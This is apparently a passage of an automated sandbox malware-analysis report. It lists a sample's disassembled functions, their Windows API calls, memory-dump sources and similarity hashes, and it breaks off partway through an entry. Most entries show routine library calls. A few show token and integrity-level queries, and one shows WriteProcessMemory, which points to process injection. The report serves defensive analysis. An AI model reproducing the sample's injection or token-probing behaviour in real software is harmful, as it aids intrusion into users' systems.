                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: 5989b6251be0f78f5255385bdb5b4acbd80254bdbe96670d3654a542fa0e147a
                                                                    • Instruction ID: 0ffdbbd939879d9aebc86e3ea2005f8adbc756a0ef9b475c3e31d3f5d7372ef9
                                                                    • Opcode Fuzzy Hash: 5989b6251be0f78f5255385bdb5b4acbd80254bdbe96670d3654a542fa0e147a
                                                                    • Instruction Fuzzy Hash: 1B01B9B2641605BFE20855509E52FBB739CABA1398F058031FD0CAA282F764EE11C3B1
                                                                    Function 00912DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6), ref: 00912DFD
                                                                    • _free.LIBCMT ref: 00912E32
                                                                    • _free.LIBCMT ref: 00912E59
                                                                    • SetLastError.KERNEL32(00000000,008E1129), ref: 00912E66
                                                                    • SetLastError.KERNEL32(00000000,008E1129), ref: 00912E6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: c7b0d3b8f83e11c0abe2335de0048a4a01bd08931014ea000a02a053048623f5
                                                                    • Instruction ID: b17615d01fd19824f1dac15230fca2f124afa6da502861dbc2dee5f6b81b52ed
                                                                    • Opcode Fuzzy Hash: c7b0d3b8f83e11c0abe2335de0048a4a01bd08931014ea000a02a053048623f5
                                                                    • Instruction Fuzzy Hash: 7A01287334960C6BC61237346C85EEB266DAFC23B5B60442CF829E61D2EF348CF15060
                                                                    Function 0094000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940070
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: f8bb5ca6811b50af588d5880d41eb1337112181ae6482631876029e8785cb0e8
                                                                    • Instruction ID: c18d58b5a6c4ad8ee0da0b72df27c2adcabf2529e8c666759888f23a28b57241
                                                                    • Opcode Fuzzy Hash: f8bb5ca6811b50af588d5880d41eb1337112181ae6482631876029e8785cb0e8
                                                                    • Instruction Fuzzy Hash: CE018FB2610204BFDB204F68DC04FAA7BADEB84791F144128FE09D2210D775DE80DBA0
                                                                    Function 0094E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0094E997
                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 0094E9A5
                                                                    • Sleep.KERNEL32(00000000), ref: 0094E9AD
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0094E9B7
                                                                    • Sleep.KERNEL32 ref: 0094E9F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: cbf754440b627041a1157663e2db19ac242ff1e9e714f82b3a2e558f4c379165
                                                                    • Instruction ID: 0bf797a937c16d67713205882244b934df62ec4328805acbbd4fcd539a6e9371
                                                                    • Opcode Fuzzy Hash: cbf754440b627041a1157663e2db19ac242ff1e9e714f82b3a2e558f4c379165
                                                                    • Instruction Fuzzy Hash: CC019E72C19A2EDBCF00AFE4DC49AEDBB78FF08310F40055AE502B2281DB349590DBA1
                                                                    Function 009410F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: 93399809475daf54d8498944f93d6993005413994d41b0db2f888147b2e6b70e
                                                                    • Instruction ID: ed6346fd8692685e4d7d4c83714fbf53ed507eba377ff6f2212bea9e3ac00f2c
                                                                    • Opcode Fuzzy Hash: 93399809475daf54d8498944f93d6993005413994d41b0db2f888147b2e6b70e
                                                                    • Instruction Fuzzy Hash: 1B0131B6114205BFDB154F65DC49E6A3F6EEF89361B104429FA45D7350DB31DC809A60
                                                                    Function 00940FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00940FCA
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00940FD6
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00940FE5
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00940FEC
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00941002
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
                                                                    • Instruction ID: e7d01d534c846caee412c99bf48947b763ae9d983ce9903fa4080c7e4c346a49
                                                                    • Opcode Fuzzy Hash: ca85b77050feb5228ab05040ce64152c46affd6301037309646a520e9634cd98
                                                                    • Instruction Fuzzy Hash: AAF06DB6214301EBDB214FA4EC4DF563FADEF89762F504428FA49D7261CA70DC809A60
                                                                    Function 00941014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
                                                                    • Instruction ID: 845ccc00898175af95d6fcc694a3bc34dcc834dc8c12411eb1bc6339fbf3fc6a
                                                                    • Opcode Fuzzy Hash: 0526d5b865e0f7ca91364b8d56c48d4956a15b882582acc7370e38ae72f99848
                                                                    • Instruction Fuzzy Hash: 22F06DB6214301EBDB215FA4EC49F563BADEF89761F100428FA49D7250CA70D8909A60
                                                                    Function 0095030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950324
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950331
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095033E
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 0095034B
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950358
                                                                    • CloseHandle.KERNEL32(?,?,?,?,0095017D,?,009532FC,?,00000001,00922592,?), ref: 00950365
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
                                                                    • Instruction ID: 2ceb5a422ff7c3d032fe594fda05a4a2b93cb980ba97cec1c53c83533914205d
                                                                    • Opcode Fuzzy Hash: c04de8c8e2adf7f28af8dcea626165b70e5ec8f42d91d86613a8c86b1f5e835a
                                                                    • Instruction Fuzzy Hash: DC01AE72800B15DFCB30AF66D880812FBF9BFA03163158A3FD19652931C3B1A998DF80
                                                                    Function 0091D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0091D752
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 0091D764
                                                                    • _free.LIBCMT ref: 0091D776
                                                                    • _free.LIBCMT ref: 0091D788
                                                                    • _free.LIBCMT ref: 0091D79A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
                                                                    • Instruction ID: f680bdb2b7392eaf05f09c818a31605aacf63cf8a313925b7ecf0395d928e8a8
                                                                    • Opcode Fuzzy Hash: 57c80ad64519f1f325c331dfd196f2fb1b6b6343fa623c6867d2f3cbde04462c
                                                                    • Instruction Fuzzy Hash: 86F04FB271520CAB8625FB6CFAC5D9677DDBF85720B940805F058DB541CB24FCD086A0
                                                                    Function 00945C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00945C58
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00945C6F
                                                                    • MessageBeep.USER32(00000000), ref: 00945C87
                                                                    • KillTimer.USER32(?,0000040A), ref: 00945CA3
                                                                    • EndDialog.USER32(?,00000001), ref: 00945CBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
                                                                    • Instruction ID: 4b4b32fc6dec7802c8c9f2545416b56f409d9b97f2d527805383b63d1fae3909
                                                                    • Opcode Fuzzy Hash: b25c437a7d42f40e2c02104e599d48b265ceb44214b8e76b1cb463dfa4cd0942
                                                                    • Instruction Fuzzy Hash: 88018171514B04ABEB315B50DDCEFA67BB8BB00B06F01065DA587A10E2DBF4A9849B91
                                                                    Function 009122A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 009122BE
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 009122D0
                                                                    • _free.LIBCMT ref: 009122E3
                                                                    • _free.LIBCMT ref: 009122F4
                                                                    • _free.LIBCMT ref: 00912305
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
                                                                    • Instruction ID: 68bea41e04053ae7569400429ae437f282db00b8d11a60131578e28380d114b8
                                                                    • Opcode Fuzzy Hash: 404891bbf46c184d92088de19240ef68918ab9c5fe3e7624ba6743c37f0335e1
                                                                    • Instruction Fuzzy Hash: A9F03AB1A282248BC616BF58BE019AD3FA4FB59771740070AF430DA2B1C73548B1BBE4
                                                                    Function 008F95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 008F95D4
                                                                    • StrokeAndFillPath.GDI32(?,?,009371F7,00000000,?,?,?), ref: 008F95F0
                                                                    • SelectObject.GDI32(?,00000000), ref: 008F9603
                                                                    • DeleteObject.GDI32 ref: 008F9616
                                                                    • StrokePath.GDI32(?), ref: 008F9631
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
                                                                    • Instruction ID: 676f406da0c2c9281bffe247fc9731387b58e432043e1f151bb74756a719bbd0
                                                                    • Opcode Fuzzy Hash: 3797950b9472eb6d56d34c3a47183b21e495b1d1edeecbcb82e7ab96b0ddc230
                                                                    • Instruction Fuzzy Hash: CDF0193102D248EBDB225F65EE287A43B65FB11376F548318F569950F0C7348991EF60
                                                                    Function 00910F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$_free
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 3432400110-3206640213
                                                                    • Opcode ID: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
                                                                    • Instruction ID: e34787312a8f83ce7f66e36d1297a9aa0abd4b6dd557678a4723a6e4106e3de3
                                                                    • Opcode Fuzzy Hash: 15ca09828b272925f98998eb687bd8018f88a2ebf4ef50a0a96fd1410ee454a7
                                                                    • Instruction Fuzzy Hash: 9CD1E131B0420EFADB289F68C845BFAB7B9EF05300F284559E7219B654D3799DC2CB91
                                                                    Function 00967B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00900242: EnterCriticalSection.KERNEL32(009B070C,009B1884,?,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090024D
                                                                      • Part of subcall function 00900242: LeaveCriticalSection.KERNEL32(009B070C,?,008F198B,009B2518,?,?,?,008E12F9,00000000), ref: 0090028A
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9
                                                                    • __Init_thread_footer.LIBCMT ref: 00967BFB
                                                                      • Part of subcall function 009001F8: EnterCriticalSection.KERNEL32(009B070C,?,?,008F8747,009B2514), ref: 00900202
                                                                      • Part of subcall function 009001F8: LeaveCriticalSection.KERNEL32(009B070C,?,008F8747,009B2514), ref: 00900235
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                    • API String ID: 535116098-3733170431
                                                                    • Opcode ID: a81b86d43daa2ca41c98fcbfe2b3936e376d41299e4a59ca4ff9e31091792c3d
                                                                    • Instruction ID: 05daefdea16bbd658461f8a1bf3f753f836e3474a36151c573604fb53ee8a55b
                                                                    • Opcode Fuzzy Hash: a81b86d43daa2ca41c98fcbfe2b3936e376d41299e4a59ca4ff9e31091792c3d
                                                                    • Instruction Fuzzy Hash: A491AC70A04208EFCB14EF98C991DBDB7B5FF89308F108459F8469B292DB75AE41CB51
                                                                    Function 00942716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0094B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421D0,?,?,00000034,00000800,?,00000034), ref: 0094B42D
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00942760
